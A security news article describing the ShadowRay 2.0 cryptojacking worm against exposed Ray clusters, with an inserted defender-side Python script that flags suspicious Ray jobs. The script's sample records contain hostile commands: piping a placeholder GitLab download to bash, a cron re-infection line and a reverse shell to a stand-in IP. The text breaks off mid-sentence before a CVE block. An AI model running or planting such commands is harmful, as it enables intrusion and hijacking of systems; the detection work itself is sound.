Shadowray 2.0 Exploits Unpatched Ray Flaw To Build Self-spreading...

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet.

The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.

The vulnerability has remained unpatched because of a "long-standing design decision" that is consistent with Ray's development best practices, which require it to be run in an isolated network and to act only on trusted code.

The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to the unauthenticated Ray Job Submission API ("/api/jobs/") on exposed dashboards. The compromised Ray clusters are then used in spray-and-pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another.

The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like "ironern440-group" and "thisisforwork440-ops" to create repositories and stash the malicious payloads. Both accounts are no longer accessible. However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations.

The payloads, in turn, leverage the platform's orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts.
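As an added defender-side example (not code from the article, Oligo, or the Ray project), the following triage pass scores Ray job records of the shape returned by the dashboard's GET /api/jobs/ endpoint for the behaviours described above: payload fetches from GitLab/GitHub, cron-based re-infection, reverse shells, XMRig, and plain reconnaissance. The field names entrypoint and runtime_env are assumed from Ray's JobDetails schema; the sample records, group name and IP address are constructed.

```python
import re

# Patterns for the behaviours the article attributes to ShadowRay 2.0:
# staged payloads pulled from GitLab/GitHub, a cron job that re-pulls the
# malware, reverse shells, and XMRig mining. Host/GPU recon scores lower.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(
        r"\b(curl|wget)\b[^|;&]*\b(gitlab\.com|github\.com|raw\.githubusercontent\.com)\b", re.I),
    "cron_persistence": re.compile(r"\bcrontab\b|/etc/cron|\*/15 \* \* \* \*"),
    "reverse_shell": re.compile(r"/dev/tcp/|\bnc\b[^|;&]*\s-e\s|\bbash -i\b"),
    "miner": re.compile(r"\bxmrig\b|stratum\+tcp://", re.I),
    "encoded_stage": re.compile(r"base64\s+(-d|--decode)\b", re.I),
    "recon": re.compile(r"\bnvidia-smi\b|\buname -a\b|/etc/passwd"),
}
WEIGHTS = {"recon": 1}  # every other hit counts 2


def job_text(job: dict) -> str:
    """Join the fields of one job record that can carry submitter-controlled commands.
    Field names follow Ray's JobDetails schema (assumed here, not verified against the page)."""
    return " ".join(str(job.get(k, "")) for k in ("entrypoint", "runtime_env", "metadata"))


def triage_job(job: dict) -> dict:
    """Score a single job record; hits are listed in SUSPICIOUS_PATTERNS order."""
    text = job_text(job)
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
    score = sum(WEIGHTS.get(h, 2) for h in hits)
    return {"submission_id": job.get("submission_id"), "hits": hits, "score": score}


def triage_jobs(jobs: list, min_score: int = 1) -> list:
    """Return flagged records, highest score first; jobs below min_score are dropped."""
    results = [triage_job(j) for j in jobs]
    return sorted((r for r in results if r["score"] >= min_score), key=lambda r: -r["score"])


# Constructed sample records (not real data) shaped like GET /api/jobs/ output.
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_benign", "entrypoint": "python train.py --epochs 10",
     "runtime_env": {"pip": ["torch"]}},
    {"submission_id": "raysubmit_recon", "entrypoint": "nvidia-smi && uname -a"},
    {"submission_id": "raysubmit_stage",
     "entrypoint": "curl -fsSL https://gitlab.com/PLACEHOLDER-GROUP/p/-/raw/main/s.sh | bash"},
    {"submission_id": "raysubmit_persist",
     "entrypoint": "(crontab -l; echo '*/15 * * * * curl -fsSL https://gitlab.com/PLACEHOLDER-GROUP/p/-/raw/main/u.sh | bash') | crontab -; "
                   "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"},
]

if __name__ == "__main__":
    for record in triage_jobs(SAMPLE_JOBS):
        print(record)
```

Pointing the same function at a live cluster means pulling the job list from the dashboard and feeding each record through triage_jobs; a non-zero hit on a cluster that should only receive trusted code is itself a finding, regardless of score.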

The threat actors "have turned Ray's legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters," researchers Avi Lumelsky and Gal Elbaz said.

The campaign has likely made use of large language models (LLMs) to create the GitLab payloads. This assessment is based on the malware's "structure, comments, and error handling patterns."

The infection chain involves an explicit check

CVE Details

Severity: CRITICAL
Affected Product: Python
Attack Vector: network